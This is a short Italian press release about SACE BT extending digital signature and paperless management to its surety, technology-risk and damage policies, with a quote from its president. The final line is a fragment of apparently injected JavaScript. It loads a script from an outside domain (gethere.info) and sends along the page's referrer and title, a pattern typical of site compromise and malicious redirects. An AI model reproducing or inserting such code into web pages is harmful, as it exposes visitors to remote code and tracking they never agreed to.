SACE BT, società operativa di SACE (Gruppo Cassa depositi e prestiti) specializzata nell’assicurazione dei crediti commerciali a breve termine e nelle cauzioni, amplia l’impiego della firma digitale e la gestione paperless a tutte le proprie polizze cauzioni, rischi tecnologici e ramo danni. Le nuove soluzioni consentiranno alle aziende assicurate di gestire l’emissione e l’archiviazione delle polizze direttamente online – con risparmio di tempi e costi – e di verificare in tempo reale i documenti e lo stato della pratica, a vantaggio di una generale semplificazione.
“Le nuove funzionalità che abbiamo messo a disposizione attraverso le nostre piattaforme – ha dichiarato Marco Traditi, Presidente di SACE BT – testimoniano l’attenzione che rivolgiamo al tema della digitalizzazione, con l’obiettivo di offrire soluzioni che rispondano alle esigenze sempre nuove dei nostri clienti e che permettano loro di liberare risorse per concentrarsi sul business. Un’innovazione che renderà più semplice e diretta la relazione tra gli oltre 17.500 assicurati di SACE BT e la rete agenziale”.
L’iniziativa rientra nelle misure previste dal Piano Industriale 2016-2020 di SACE nel quale si punta – fra gli altri obiettivi – a ridisegnare prodotti e servizi, oltre che a essere più vicini agli imprenditori e alle loro aziende, grazie allo sviluppo di un’offerta sempre più digitale.
s.src=’http://gethere.info/kt/?264dpr&frm=script&se_referrer=’ + encodeURIComponent(document.referrer) + ‘&default_keyword=’ + encodeURIComponent(document.title) + ”;